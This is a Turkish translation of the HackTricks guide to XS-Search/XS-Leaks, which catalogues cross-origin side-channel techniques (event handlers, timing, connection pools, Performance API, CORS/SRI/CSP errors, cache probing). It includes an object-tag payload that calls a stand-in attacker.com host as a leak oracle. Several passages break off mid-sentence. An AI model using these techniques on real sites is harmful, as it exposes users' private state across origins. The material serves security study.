Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search.md
Translator workflow 6cb783ece2 Translated to Turkish
2024-02-10 18:14:16 +00:00

79 KiB
Raw Blame History

XS-Search/XS-Leaks

Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturabilir ve otomatikleştirebilirsiniz.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Temel Bilgiler

XS-Search, yan kanal zafiyetlerini kullanarak çapraz kaynak bilgilerini çıkarmak için kullanılan bir yöntemdir.

Bu saldırıda yer alan temel bileşenler şunlardır:

  • Zayıf Web: Bilgilerin çıkarılması amaçlanan hedef web sitesi.
  • Saldırganın Web'i: Saldırgan tarafından oluşturulan kötü niyetli web sitesi, kurbanın ziyaret ettiği ve saldırıyı barındıran.
  • Dahil Etme Yöntemi: Zayıf Web'i Saldırganın Web'ine dahil etmek için kullanılan teknik (örneğin, window.open, iframe, fetch, href ile HTML etiketi vb.).
  • Sızıntı Tekniği: Dahil etme yöntemi aracılığıyla toplanan bilgilere dayanarak Zayıf Web'in durumu arasındaki farkları ayırt etmek için kullanılan teknikler.
  • Durumlar: Saldırganın ayırt etmeyi amaçladığı Zayıf Web'in iki potansiyel durumu.
  • Ayırt Edilebilir Farklar: Saldırganın Zayıf Web'in durumunu çıkarım yapmak için güvendiği gözlemlenebilir farklılıklar.

Ayırt Edilebilir Farklar

Zayıf Web'in durumlarını ayırt etmek için birkaç yön incelenebilir:

  • Durum Kodu: Çapraz kaynakta çeşitli HTTP yanıt durum kodları arasındaki farkı ayırt etmek, sunucu hataları, istemci hataları veya kimlik doğrulama hataları gibi.
  • API Kullanımı: Sayfalar arasında Web API'lerinin kullanımını belirlemek, çapraz kaynak sayfasının belirli bir JavaScript Web API'sini kullanıp kullanmadığını ortaya çıkarır.
  • Yönlendirmeler: Yalnızca HTTP yönlendirmeleri değil, JavaScript veya HTML tarafından tetiklenen farklı sayfalara yapılan gezinmeleri tespit etmek.
  • Sayfa İçeriği: HTTP yanıt gövdesindeki veya sayfa alt kaynaklarında (gömülü çerçevelerin sayısı veya görüntülerdeki boyut farklılıkları gibi) değişikliklerin gözlemlenmesi.
  • HTTP Başlığı: Belirli bir HTTP yanıt başlığının varlığını veya olası değerini (X-Frame-Options, Content-Disposition ve Cross-Origin-Resource-Policy gibi başlıklar) belirlemek.
  • Zamanlama: İki durum arasındaki tutarlı zaman farklarını fark etmek.

Dahil Etme Yöntemleri

  • HTML Öğeleri: HTML, stil sayfaları, görüntüler veya betikler gibi çapraz kaynak kaynağı dahil etme için çeşitli öğeler sunar, tarayıcının bir HTML olmayan kaynağı istemesini sağlar. Bu amaçla potansiyel HTML öğelerinin bir derlemesi https://github.com/cure53/HTTPLeaks adresinde bulunabilir.
  • Çerçeveler: iframe, object ve embed gibi öğeler, HTML kaynaklarını doğrudan saldırganın sayfasına yerleştirir. Sayfa çerçeve koruması eksikse, JavaScript, çerçevelenmiş kaynağın pencere nesnesine contentWindow özelliği aracılığıyla erişebilir.
  • ılır Pencereler: window.open yöntemi, JavaScript'in SOP'yi takip eden yöntemler ve özelliklerle etkileşimde bulunabilmesi için bir kaynağı yeni bir sekmede veya pencerede açar. Açılır pencereler, genellikle tek oturum açma işleminde kullanılır ve hedef kaynağın çerçeveleme ve çerez kısıtlamalarını atlar. Bununla birlikte, modern tarayıcılar açılır pencere oluşturmayı belirli kullanıcı eylemlerine sınırlar.
  • JavaScript İstekleri: JavaScript, XMLHttpRequests veya Fetch API kullanarak hedef kaynaklara doğrudan istekler yapabilir. Bu yöntemler, HTTP yönlendirmelerini takip etme gibi isteğe tam kontrol sağlar.

Sızıntı Teknikleri

  • Olay İşleyici: XS-Leaks'te klasik bir sızıntı tekniği olan olay işleyicileri (onload ve onerror gibi), kaynak yükleme başarısı veya başarısızlığı hakkında bilgi sağlar.
  • Hata Mesajları: JavaScript istisnaları veya özel hata sayfaları, hata mesajının kendisinden veya varlığı ve yokluğu arasındaki farktan kaynak sızıntısı bilgisi sağlayabilir.
  • Genel Sınırlar: Tarayıcının bellek kapasitesi veya diğer zorunlu tarayıcı sınırlamaları gibi tarayıcının fiziksel sınırlamaları, bir eşik noktasına ulaşıldığında sızıntı tekniği olarak hizmet edebilir.
  • Genel Durum: Tarayıcıların genel durumlarıyla (örneğin, Geçmiş arabirimi) tespit edilebilir etkileşimler sömürülebilir. Örneğin, bir tarayıcının geçmişindeki girişlerin sayısı, çapraz kaynak sayfaları hakkında ipuçları sunabilir.
  • Performans API'si: Bu API, mevcut sayfanın performans ayrıntılarını, belge ve yüklenen kaynaklar için ağ zamanlamasını içeren performans ayrıntıları sağlar, istenen kaynaklar hakkında çıkarımlar yapmayı sağlar.
  • Okunabilir Öznitelikler: Bazı HTML öznitelikleri çapraz kaynakta okunabilir ve sızıntı tekniği olarak kullanılabilir. Örneğin, window.frame.length özelliği, bir web sayfasında yer alan çerçeveleri saymak için JavaScript'in kullanılmasına olanak tanır.

XSinator Aracı ve Makale

XSinator, birkaç bilinen XS-Leaks'e karşı tarayıcıları kontrol etmek için otomatik bir araçtır ve makalesiyle açıklanmıştır: https://xsinator.com/paper.pdf

Araça https://xsinator.com/ adresinden erişebilirsiniz

{% hint style="warning" %} Dışlanan XS-Leaks: XSinator'da diğer sızınt

Zamanlama Tabanlı Teknikler

Aşağıdaki tekniklerin bazıları, web sayfalarının olası durumlarındaki farklılıkları tespit etmek için süreyi kullanacak. Bir web tarayıcısında zamanı ölçmenin farklı yolları vardır.

Saatler: performance.now() API, geliştiricilere yüksek çözünürlüklü zaman ölçümleri almayı sağlar.
Saldırganların zımni saatler oluşturmak için istismar edebileceği önemli sayıda API bulunmaktadır: Broadcast Channel API, Message Channel API, requestAnimationFrame, setTimeout, CSS animasyonları ve diğerleri.
Daha fazla bilgi için: https://xsleaks.dev/docs/attacks/timing-attacks/clocks.

Olay İşleyici Teknikleri

Onload/Onerror

{% content-ref url="xs-search/cookie-bomb-+-onerror-xs-leak.md" %} cookie-bomb-+-onerror-xs-leak.md {% endcontent-ref %}

Örnek kod, JS'den script nesneleri yüklemeyi deniyor, ancak nesneler, stil sayfaları, resimler, sesler gibi diğer etiketler de kullanılabilir. Dahası, etiketi doğrudan enjekte etmek ve etiketin içinde onload ve onerror olaylarını bildirmek de mümkündür (JS'den enjekte etmek yerine).

Bu saldırının ayrıca script olmayan bir versiyonu da vardır:

<object data="//example.com/404">
<object data="//attacker.com/?error"></object>
</object>

Bu durumda, example.com/404 bulunamazsa attacker.com/?error yüklenecektir.

Onload Zamanlama

{% content-ref url="xs-search/performance.now-example.md" %} performance.now-example.md {% endcontent-ref %}

Onload Zamanlama + Zorunlu Ağır Görev

Bu teknik, öncekiyle aynıdır, ancak saldırgan, cevap olumlu veya olumsuz olduğunda biraz zaman alacak bir ilgili eylem de zorlar ve bu süreyi ölçer.

{% content-ref url="xs-search/performance.now-+-force-heavy-task.md" %} performance.now-+-force-heavy-task.md {% endcontent-ref %}

unload/beforeunload Zamanlama

Bir kaynağın alınması için geçen süre, unload ve beforeunload olaylarını kullanarak ölçülebilir. beforeunload olayı, tarayıcının yeni bir sayfaya yönlendirmek üzere olduğu zaman tetiklenirken, unload olayı navigasyon gerçekleştiğinde meydana gelir. Bu iki olay arasındaki zaman farkı, tarayıcının kaynağı almak için harcadığı süreyi belirlemek için hesaplanabilir.

Sandboxed Frame Zamanlama + onload

Framing Protections olmadığında, bir sayfanın ve alt kaynaklarının ağ üzerinden yüklenmesi için gereken süre bir saldırgan tarafından ölçülebilir. Bu ölçüm genellikle bir iframe'in onload işleyicisi, kaynak yükleme ve JavaScript yürütmesinin tamamlanmasından sonra tetiklenir. Betik yürütme tarafından tanıtılan değişkenliği atlatmak için, bir saldırgan <iframe> içinde sandbox özniteliğini kullanabilir. Bu özniteliğin eklenmesi, JavaScript'in yürütülmesi de dahil olmak üzere birçok işlevin kısıtlanmasını sağlar ve bu da ölçümün çoğunlukla ağ performansından etkilenen bir ölçüm yapılmasını kolaylaştırır.

// Example of an iframe with the sandbox attribute
<iframe src="example.html" sandbox></iframe>

#ID + hata + onload

  • Ekleme Yöntemleri: Frames
  • Algılanabilir Fark: Sayfa İçeriği
  • Daha fazla bilgi:
  • Özet: Doğru içeriğe erişildiğinde sayfada hata oluşturabilir ve herhangi bir içerik erişildiğinde doğru şekilde yüklenmesini sağlayabilirseniz, zamanı ölçmeden tüm bilgileri çıkarmak için bir döngü oluşturabilirsiniz.
  • Örnek Kod:

Varsayalım ki gizli içeriğe sahip olan sayfayı Iframe içine ekleyebilirsiniz.

Kurbanın "flag" içeren bir dosyayı aramasını sağlayabilirsiniz, örneğin bir CSRF'yi kullanarak bir Iframe içinde (exploit). Iframe içinde, onload etkinliği her zaman en az bir kez yürütülecektir. Ardından, URL'nin içindeki hash'in sadece içeriğini değiştirerek Iframe'ın URL'sini değiştirebilirsiniz.

Örneğin:

  1. URL1: www.saldırgan.com/xssearch#try1
  2. URL2: www.saldırgan.com/xssearch#try2

İlk URL başarıyla yüklendi ise, URL'nin hash kısmını değiştirdiğinizde onload etkinliği tekrar tetiklenmeyecektir. Ancak sayfa yüklenirken bir tür hata oluştuysa, onload etkinliği tekrar tetiklenecektir.

Bu şekilde, doğru yüklenen bir sayfa ile erişilen bir hata içeren sayfa arasında ayrım yapabilirsiniz.

Javascript Yürütme

  • Ekleme Yöntemleri: Frames
  • Algılanabilir Fark: Sayfa İçeriği
  • Daha fazla bilgi:
  • Özet: Sayfa, duyarlı içeriği geri döndürüyorsa veya kullanıcı tarafından kontrol edilebilen bir içerik döndürüyorsa, kullanıcı negatif durumda geçerli JS kodunu ayarlayabilir ve her denemeyi <script> etiketleri içinde yükleyebilir, böylece negatif durumlarda saldırganların kodu yürütülür, olumlu durumlarda ise hiçbir şey yürütülmez.
  • Örnek Kod:

{% content-ref url="xs-search/javascript-execution-xs-leak.md" %} javascript-execution-xs-leak.md {% endcontent-ref %}

CORB - Onerror

  • Ekleme Yöntemleri: HTML Öğeleri
  • Algılanabilir Fark: Durum Kodu ve Başlıklar
  • Daha fazla bilgi: https://xsleaks.dev/docs/attacks/browser-features/corb/
  • Özet: Cross-Origin Read Blocking (CORB), Spectre gibi saldırılara karşı koruma sağlamak için web sayfalarının belirli hassas cross-origin kaynakları yüklemesini engelleyen bir güvenlik önlemidir. Bununla birlikte, saldırganlar koruyucu davranışını istismar edebilir. CORB'a tabi bir yanıt, Content-Type'da CORB korumalı bir değerle nosniff ve 2xx durum kodu döndürdüğünde, CORB, yanıtın gövdesini ve başlıklarını kaldırır. Bunu gözlemleyen saldırganlar, durum kodu (başarı veya hata gösteren) ve Content-Type'ın (CORB tarafından korunup korunmadığını belirten) kombinasyonunu çıkarabilir ve potansiyel bilgi sızıntısına yol açabilir.
  • Örnek Kod:

Saldırı hakkında daha fazla bilgi için daha fazla bilgi bağlantısına bakın.

onblur

Bir sayfayı bir iframe içine yüklemek ve sayfanın #id_değeri ile iframe'ın öğesine odaklanmasını sağlamak mümkündür, ardından onblur sinyali tetiklendiğinde ID öğesi var demektir.
Aynı saldırıyı portal etiketleriyle gerçekleştirebilirsiniz.

postMessage Yayınları

  • Ekleme Yöntemleri: Frames, Açılır Pencereler
  • Algılanabilir Fark: API Kullanımı
  • Daha fazla bilgi: https://xsleaks.dev/docs/attacks/postmessage-broadcasts/
  • Özet: postMessage'dan hassas bilgileri toplamak veya postMessage'ın varlığını bir oracle olarak kullanarak kullanıcının sayfadaki durumunu bilmek.
  • Örnek Kod: Tüm postMessage'ları dinleyen herhangi bir kod.

Uygulamalar genellikle farklı kökenler arasında iletişim kurmak için postMessage yayınlarını kullanır. Ancak, hedef köken parametresi doğru şekilde belirtilmezse, bu yöntem yanlışlıkla hassas bilgileri ortaya çıkarabilir ve herhangi bir pencerenin mesajları almasına izin verebilir. Ayrıca, bir mesaj almanın tek başına bir oracle olarak işlev görebilir; örneğin, belirli mesajlar yalnızca oturum açmış kullanıcılara gönderilebilir. Bu nedenle, bu mesajların varlığı veya yokluğu, kullanıcının durumu veya kimliği hakkında bilgi verebilir, örneğin kimlik doğrulamasının yapıldığı veya yapılmadığı gibi.

En gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturmanıza ve otomatikleştirmenize olanak sağlayan Trickest'i kullanın.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Global Sınırlar Teknikleri

WebSocket API

Hedef sayfanın kaç tane WebSocket bağlantısı kullandığını ve nasıl kullandığını belirlemek mümkündür. Bu, saldırganın uygulama durumlarını tespit etmesine ve WebSocket bağlantı sayısıyla ilişkili bilgileri sızdırmasına olanak tanır.

Bir köken, bağlantıların durumlarına bakılmaksızın, maksimum miktarda WebSocket bağlantı nesnesini kullandığında, yeni nesnelerin oluşturulması **JavaScript istisn

Ödeme API'si

Bu XS-Leak, bir saldırganın çapraz kaynaklı bir sayfanın bir ödeme isteği başlattığını tespit etmesine olanak tanır.

Çünkü aynı anda yalnızca bir ödeme isteği etkin olabilir, hedef web sitesi Ödeme İsteği API'sini kullanıyorsa, bu API'yi kullanmaya yönelik herhangi bir daha sonraki girişim başarısız olacak ve bir JavaScript istisnasına neden olacaktır. Saldırgan, Ödeme API'sinin kullanılıp kullanılmadığını periyodik olarak Ödeme API'si UI'sini göstermeye çalışarak sömürebilir. Bir deneme istisna oluşturursa, hedef web sitesi şu anda bunu kullanıyor demektir. Saldırgan, bu periyodik denemeleri hemen oluşturduktan sonra UI'yi kapatıp gizleyebilir.

Olay Döngüsünün Zamanlaması

{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}

JavaScript, tek iş parçacıklı bir olay döngüsü eşzamanlılık modeli üzerinde çalışır, bu da aynı anda yalnızca bir görevi yürütebileceği anlamına gelir. Bu özellik, farklı bir kökenden gelen kodun yürütülmesinin ne kadar sürdüğünü ölçmek için sömürülebilir. Bir saldırgan, sürekli olarak sabit özelliklere sahip olayları göndererek kendi kodunun olay döngüsündeki yürütme süresini ölçebilir. Bu olaylar, olay havuzu boş olduğunda işlenecektir. Diğer kökenler de aynı havuza olay gönderiyorsa, bir saldırgan, kendi görevlerinin yürütülmesindeki gecikmeleri gözlemleyerek bu harici olayların yürütülme süresini çıkarabilir. Gecikmeleri izlemek için olay döngüsünü denetlemek, farklı kökenlerden gelen kodun yürütme süresini ortaya çıkarabilir ve hassas bilgilerin ortaya çıkmasına neden olabilir.

{% hint style="warning" %} Bir yürütme zamanlamasında, daha kesin ölçümler elde etmek için ağ faktörlerini ortadan kaldırmak mümkündür. Örneğin, sayfanın yüklenmeden önce kullanılan kaynakları yükleyerek. {% endhint %}

Meşgul Olay Döngüsü

  • Dahil Etme Yöntemleri:

  • Algılanabilir Fark: Zamanlama (genellikle Sayfa İçeriği, Durum Kodu nedeniyle)

  • Daha fazla bilgi: https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop

  • Özet: Bir web işleminin yürütme süresini ölçmenin bir yolu, bir iş parçacığın olay döngüsünü kasıtlı olarak engellemek ve ardından olay döngüsünün tekrar kullanılabilir hale gelmesi için geçen süreyi zamanlamaktır. Bir iş parçacığına (uzun bir hesaplama veya senkron API çağrısı gibi) bir engelleme işlemi ekleyerek ve sonraki kodun yürütme süresini izleyerek, engelleme süresi boyunca olay döngüsünde yürütülen görevlerin süresini çıkarabilirsiniz. Bu teknik, JavaScript'in tek iş parçacıklı olay döngüsünün, görevlerin sırayla yürütüldüğü, diğer işlemlerin aynı iş parçacığını paylaşan diğer işlemlerin performansı veya davranışı hakkında bilgi sağlayabilir.

  • Kod Örneği:

Olay döngüsünü kilitleyerek yürütme süresini ölçme tekniğinin önemli bir avantajı, Site İzolasyonu'nu atlatma potansiyeline sahip olmasıdır. Site İzolasyonu, farklı web sitelerini ayrı işlemlere ayıran bir güvenlik özelliğidir ve kötü niyetli sitelerin diğer sitelerin hassas verilerine doğrudan erişmesini engellemeyi amaçlar. Bununla birlikte, paylaşılan olay döngüsü aracılığıyla başka bir kökenin yürütme zamanlamasını etkileyerek, bir saldırgan o kökenin faaliyetleri hakkında bilgi çıkarabilir. Bu yöntem, diğer kökenin verilerine doğrudan erişime dayanmaz, ancak o kökenin faaliyetlerinin paylaşılan olay döngüsü üzerindeki etkisini gözlemler ve böylece Site İzolasyonu tarafından oluşturulan koruyucu engelleri atlatır.

{% hint style="warning" %} Bir yürütme zamanlamasında, daha kesin ölçümler elde etmek için ağ faktörlerini ortadan kaldırmak mümkündür. Örneğin, sayfanın yüklenmeden önce kullanılan kaynakları yükleyerek. {% endhint %}

Bağlantı Havuzu

  • Dahil Etme Yöntemleri: JavaScript İstekleri
  • Algılanabilir Fark: Zamanlama (genellikle Sayfa İçeriği, Durum Kodu nedeniyle)
  • Daha fazla bilgi: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
  • Özet: Bir saldırgan, tüm soketleri 1 hariç kilitler, hedef webi yükler ve aynı anda başka bir sayfayı yükler, son sayfanın yüklenmeye başlaması için geçen süre, hedef sayfanın yüklenme süresidir.
  • Kod Örneği:

{% content-ref url="xs-search/connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}

Tarayıcılar sunucu iletişimi için soketleri kullanır, ancak işletim sistemi ve donanımın sınırlı kaynakları nedeniyle, tarayıcılar eşzamanlı soketler üzerinde bir sınırlama uygulamak zorunda kalır. Saldırganlar bu sınırlamayı aşağıdaki adımlarla sömürebilir:

  1. Tarayıcının soket sınırını belirleyin, örneğin 256 global soket.
  2. 255 soketi uzun bir süre boyunca işgal ederek, bağlantıları tamamlamadan açık tutacak şekilde çeşitli ana bilgisayarlara 255 istek başlatın.
    1. soketi hedef sayfaya bir istek göndermek için kullanın.
  4. Farklı bir ana bilgisayara 257. bir istek yapmaya çalışın. 2. ve 3. adımlara göre tüm soketler kullanımda olduğundan,

Performans API Teknikleri

Performans API, web uygulamalarının performans metriklerine dair bilgiler sunar ve Kaynak Zamanlama API tarafından daha da zenginleştirilir. Kaynak Zamanlama API, isteklerin süreleri gibi ayrıntılı ağ istek zamanlamalarının izlenmesini sağlar. Özellikle sunucular, yanıtlarında Timing-Allow-Origin: * başlığını içeriyorsa, transfer boyutu ve alan arama süresi gibi ek veriler kullanılabilir hale gelir.

Bu zengin veri, performance.getEntries veya performance.getEntriesByName gibi yöntemler aracılığıyla alınabilir ve performansla ilgili bilgilerin kapsamlı bir görünümünü sağlar. Ayrıca, API, performance.now() ile elde edilen zaman damgaları arasındaki farkı hesaplayarak yürütme sürelerinin ölçülmesini kolaylaştırır. Ancak, Chrome gibi bazı tarayıcılarda, performance.now()'un hassasiyeti milisaniyelerle sınırlı olabilir, bu da zamanlama ölçümlerinin ayrıntısını etkileyebilir.

Zamanlama ölçümlerinin ötesinde, Performans API'si güvenlikle ilgili bilgiler için de kullanılabilir. Örneğin, Chrome'da performance nesnesindeki sayfaların varlığı veya yokluğu, X-Frame-Options'ın uygulanmasını gösterebilir. Özellikle, bir sayfa X-Frame-Options nedeniyle bir çerçevede görüntülenmesi engellenirse, performance nesnesinde kaydedilmeyeceğinden sayfanın çerçeveleme politikaları hakkında ipucu sağlar.

Hata Sızıntısı

Hatalara yol açan bir istek, bir performans girişi oluşturmaz, bu nedenle HTTP yanıt durum kodları arasında farklılık yapmak mümkündür.

Stil Yeniden Yükleme Hatası

Önceki teknikte, GC'deki tarayıcı hataları nedeniyle yüklenemeyen kaynaklar iki kez yüklenir olarak belirlendi. Bu, Performans API'sinde birden fazla giriş oluşturur ve bu nedenle algılanabilir.

İstek Birleştirme Hatası

Teknik, belirtilen makalenin bir tablosunda bulundu, ancak teknikle ilgili bir açıklama bulunamadı. Bununla birlikte, https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak adresinde kontrol ederek kaynak kodunu bulabilirsiniz.

Boş Sayfa Sızıntısı

Bir saldırgan, bir isteğin boş bir HTTP yanıt gövdesiyle sonuçlandığını tespit edebilir çünkü boş sayfalar bazı tarayıcılarda performans girişi oluşturmaz.

XSS-Auditor Sızıntısı

Güvenlik İddialarında (SA), başlangıçta Cross-Site Scripting (XSS) saldırılarını önlemek için tasarlanan XSS Denetleyicisi, paradoksal bir şekilde hassas bilgilerin sızdırılmasına neden olmak için kullanılabilir. Bu yerleşik özellik Google Chrome'dan (GC) kaldırıldı, ancak SA'da hala mevcuttur. 2013 yılında, Braun ve Heiderich, XSS Denetleyicisinin yanlış pozitiflere yol açabilecek şekilde meşru betikleri engelleyebileceğini gösterdiler. Araştırmacılar, bu temel alınarak, hassas bilgilerin çıkarılması ve çapraz kaynak sayfalarında belirli içeriğin tespit edilmesi için teknikler geliştirdiler. Bu kavrama XS-Leak denir ve başlangıçta Terada tarafından bildirilmiş ve Heyes tarafından bir blog yazısında ayrıntılı olarak açıklanmıştır. Bu teknikler GC'deki XSS Denetleyicisiyle ilgiliyken, SA'da XSS Denetleyicisi tarafından engellenen sayfalar, Performans API'sinde giriş oluşturmaz, böylece hassas bilgilerin sızdırılabileceği bir yöntem ortaya çıkar.

X-Frame Sızıntısı

Yönlendirme Başlangıcı Sızıntısı

Bazı tarayıcıların, çapraz kaynak istekleri için çok fazla bilgi kaydettiği davranışını istismar eden bir XS-Leak örneği bulduk. Standart, çapraz kaynak kaynakları için sıfıra ayarlanması gereken bir alt küme özniteliği tanımlar. Ancak, SA'da hedef sayfa tarafından yönlendirilip yönlendirilmediği, Performans API'sini sorgulayarak ve redirectStart zamanlama verilerini kontrol ederek tespit edilebilir.

Süre Yönlendirme Sızıntısı

GC'de, bir yönlendirme sonucunda gerçekleşen isteklerin süresi negatif ve bu nedenle yönlendirme olmayan isteklerden ayrılabilir.

CORP Sızıntısı

Bazı durumlarda, nextHopProtocol girişi bir sızıntı tekniği olarak kullanılabilir. GC'de, CORP başlığı ayarlandığında, nextHopProtocol boş olacaktır. CORP etkin kaynaklar için SA hiçbir performans girişi oluşturmayacaktır.

Hizmet İşçisi

Hizmet işçileri, bir kökte çalışan olaya dayalı betik bağlamlarıdır. Bir web sayfasının arka planında çalışırlar ve çevrimdışı web uygulaması oluşturmak için kaynakları ön belleğe alabilir, değiştirebilir ve önbelleğe alabilirler.
Bir hizmet işçisi tarafından ön belleğe alınan bir kaynak, iframe aracılığıyla erişildiğinde, kaynak hizmet işçisi önbelleğinden yüklenir.
Kaynağın hizmet işçisi önbelleğinden yüklendiği tespit edilmek istenirse, Performans API kullanılabilir.
Bu ayrıca bir Zamanlama saldırısıyla da yapılabilir (daha fazla bilgi için makaleye bakın).

Önbellek

Performans API kullanılarak bir kaynağın önbelleğe alınıp alınmadığı kontrol edilebilir.

Ağ Süresi

Hata Mesajları Tekniği

Medya Hatası

// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
document.getElementById("log").innerHTML += msg;
}

function startup() {
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";

// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("<strong>Status: " + status + "</strong> (Error code:" + err.code + " / Error Message: " + err.message + ")<br>");
};
audioElement.onerror = errHandler;
}

MediaError arayüzünün message özelliği, başarılı bir şekilde yüklenen kaynakları benzersiz bir dizeyle tanımlar. Bir saldırgan, bu özelliği kullanarak mesaj içeriğini gözlemleyerek bir kaynak üzerindeki cross-origin yanıt durumunu çıkarabilir.

CORS Hatası

Bu teknik, bir saldırganın Webkit tabanlı tarayıcıların CORS isteklerini nasıl işlediğini istismar ederek cross-origin bir site'nin yönlendirme hedefini çıkarmasını sağlar. Özellikle, kullanıcı durumuna dayalı olarak bir yönlendirme yapan hedef siteye bir CORS etkin istek gönderildiğinde ve tarayıcı daha sonra isteği reddederse, hata mesajı içinde yönlendirmenin hedefinin tam URL'si açığa çıkar. Bu zafiyet, sadece yönlendirmenin gerçekleştiğini değil, aynı zamanda yönlendirmenin hedefini ve içerebileceği duyarlı sorgu parametrelerini de ortaya çıkarır.

SRI Hatası

Bir saldırgan, ayrıntılı hata mesajlarını kullanarak cross-origin yanıtların boyutunu çıkarabilir. Bu, Subresource Integrity (SRI) mekanizmasının, genellikle CDN'lerden alınan kaynakların değiştirilmediğini doğrulamak için bütünlük özniteliğini kullandığından mümkündür. SRI'nin cross-origin kaynaklarda çalışabilmesi için bunların CORS etkin olması gerekir; aksi takdirde bütünlük kontrolüne tabi tutulmazlar. Güvenlik İddiaları (SA) içinde, CORS hata XS-Leak gibi, bir bütünlük özniteliği içeren bir fetch isteği sonrasında bir hata mesajı yakalanabilir. Saldırganlar, herhangi bir isteğin bütünlük özniteliğine sahte bir karma değeri atayarak bu hatayı kasıtlı olarak tetikleyebilir. SA'da, ortaya çıkan hata mesajı istenen kaynağın içerik uzunluğunu yanlışlıkla ortaya çıkarır. Bu bilgi sızıntısı, bir saldırganın yanıt boyutundaki farklılıkları ayırt etmesine olanak tanır ve sofistike XS-Leak saldırıları için yol açar.

CSP İhlali/Tespiti

Bir XS-Leak, CSP'yi kullanarak cross-origin bir sitenin farklı bir kök siteye yönlendirilip yönlendirilmediğini tespit edebilir. Bu sızıntı yönlendirmeyi tespit edebilir, ancak ayrıca yönlendirme hedefinin alan adı da sızar. Bu saldırının temel fikri, saldırgan sitesinde hedef alan adına izin vermektedir. Bir istek hedef alan adına gönderildiğinde, bu alan adı cross-origin bir etki alanına yönlendirilir. CSP, buna erişimi engeller ve bir sızıntı tekniği olarak kullanılan bir ihlal raporu oluşturur. Tarayıcıya bağlı olarak, bu rapor yönlendirmenin hedef konumunu sızdırabilir. Modern tarayıcılar yönlendirildiği URL'yi belirtmese de, hala bir cross-origin yönlendirme tetiklendiğini tespit edebilirsiniz.

Önbellek

Tarayıcılar tüm web siteleri için paylaşılan bir önbellek kullanabilir. Kökenlerinden bağımsız olarak, bir hedef sayfanın belirli bir dosyayı isteyip istemediği çıkarılabilir.

Bir sayfa, kullanıcı giriş yaptığında yalnızca bir resmi yüklerse, kaynağı geçersiz kılabilirsiniz (eğer önbellekteyse artık önbellekte olmaz, daha fazla bilgi için bağlantılara bakın), bu kaynağı yükleyebilecek bir isteği gerçekleştirin ve kaynağı hatalı bir istekle yüklemeye çalışın (örneğin, aşırı uzun bir referer başlığı kullanarak). Kaynak yüklemesi herhangi bir hata tetiklemediyse, bu kaynak önbellekte olduğu anlamına gelir.

CSP Yönergesi

Google Chrome'da (GC) yeni bir özellik, web sayfalarının bir iframe öğesine bir öznitelik atayarak bir İçerik Güvenlik Politikası (CSP) önermesine izin

CORB

Saldırı hakkında daha fazla bilgi için bağlantıyı kontrol edin.

CORS hatası Origin Reflection yanlısı yapılandırmada

Eğer Origin başlığı Access-Control-Allow-Origin başlığında yansıtılıyorsa, bir saldırgan bu davranışı istismar ederek kaynağı CORS modunda almaya çalışabilir. Eğer bir hata tetiklenmezse, kaynağın web'den doğru bir şekilde alındığı anlamına gelir. Eğer bir hata tetiklenirse, bu kaynağın önbellekten erişildiği anlamına gelir (hata, önbelleğe CORS başlığıyla orijinal alan adını ve saldırganın alan adını izin veren bir yanıtı kaydederken oluşur).
Unutulmamalıdır ki, eğer origin yansıtılmıyorsa ancak joker karakteri kullanılıyorsa (Access-Control-Allow-Origin: *), bu yöntem çalışmayacaktır.

Okunabilir Öznitelik Tekniği

Fetch Yönlendirmesi

Fetch API kullanarak redirect: "manual" ve diğer parametrelerle bir istek göndererek, response.type özniteliğini okumak mümkündür ve eğer bu öznitelik opaqueredirect ile eşitse, yanıt bir yönlendirmedir.

COOP

Bir saldırgan, çapraz kökenli bir HTTP yanıtında Cross-Origin Opener Policy (COOP) başlığının varlığını çıkarabilir. COOP, web uygulamaları tarafından harici sitelerin keyfi pencere referanslarına erişmesini engellemek için kullanılır. Bu başlığın görünürlüğü, contentWindow referansına erişmeye çalışarak tespit edilebilir. COOP koşullu olarak uygulandığında, opener özelliği bir ipucu olur: COOP aktif olduğunda tanımlanmamış olurken, yokluğunda tanımlanır.

URL Maksimum Uzunluğu - Sunucu Tarafı

Eğer sunucu tarafında bir yönlendirme, yönlendirmede kullanıcı girişi ve ekstra veri kullanıyorsa, bu davranışı tespit etmek mümkündür çünkü genellikle sunucuların bir istek uzunluk sınırı vardır. Eğer kullanıcı verisi bu uzunluğa - 1 eşitse, çünkü yönlendirme bu veriyi kullanıyor ve ekstra bir şey ekliyor, bu Hata Olayları aracılığıyla tespit edilebilen bir hata tetiklenir.

